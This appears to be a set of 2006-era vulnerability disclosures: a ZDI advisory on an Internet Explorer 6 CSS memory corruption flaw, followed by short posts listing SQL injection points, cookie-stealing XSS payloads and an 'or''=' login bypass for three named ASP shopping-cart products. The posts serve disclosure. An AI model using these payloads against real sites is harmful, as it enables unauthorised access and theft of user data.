ZDI-06-041: Microsoft Internet Explorer CSS Float Property Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-041.html November 14, 2006 -- CVE ID: CVE-2006-4687 -- Affected Vendor: Microsoft -- Affected Products: Internet Explorer 6 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since October 10, 2006 by Digital Vaccine protection filter ID 4761. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific vulnerability exists due to improper parsing of HTML CSS 'float' properties. By ordering specially crafted 'div' tags in a web page, memory corruption can occur leading to remote code execution. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/Bulletin/MS06-067.mspx -- Disclosure Timeline: 2006.07.18 - Vulnerability reported to vendor 2006.10.10 - Digital Vaccine released to TippingPoint customers 2006.11.14 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Sam Thomas. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
A+ Store E-Commerce[ injection sql xss (post) ]
vendor site:http://www.webinhabit.com/ product:A+ Store E-Commerce bug:injection sql xss post risk:medium injection sql (get) : http://site.com/browse.asp?ParentID='[sql] xss post : in /account_login.asp: username = /textarea'scriptalert(document.cookie)/script/textarea'scriptalert(document.cookie)/script passwd = /textarea'scriptalert(document.cookie)/script/textarea'scriptalert(document.cookie)/script laurent gaffié benjamin mossé http://s-a-p.ca/ contact: [EMAIL PROTECTED]
A-Cart pro[ injection sql (postget)]
vendor site:http://www.alanward.net/ product:A-Cart pro bug:injection sql risk:medium injection sql (get) : /category.asp?catcode='[sql] /product.asp?productid='[sql] injection sql (post) : http://site.com/search.asp Variables: /search.asp?search='[sql] ( or just post your query in the search engine ... ) laurent gaffié benjamin mossé http://s-a-p.ca/ contact: [EMAIL PROTECTED]
hpecs shopping cart[login bypass injection sql (post)]
vendor site:http://hpe.net/ product:hpecs shopping cart bug:injection sql risk:high login bypass : username: 'or''=' passwd: 'or''=' injection sql (post) : http://site.com/search_list.asp variables: Hpecs_Find=maingroupsearchstring='[sql] ( or just post your query in the search engine ... ) laurent gaffié benjamin mossé http://s-a-p.ca/ contact: [EMAIL PROTECTED]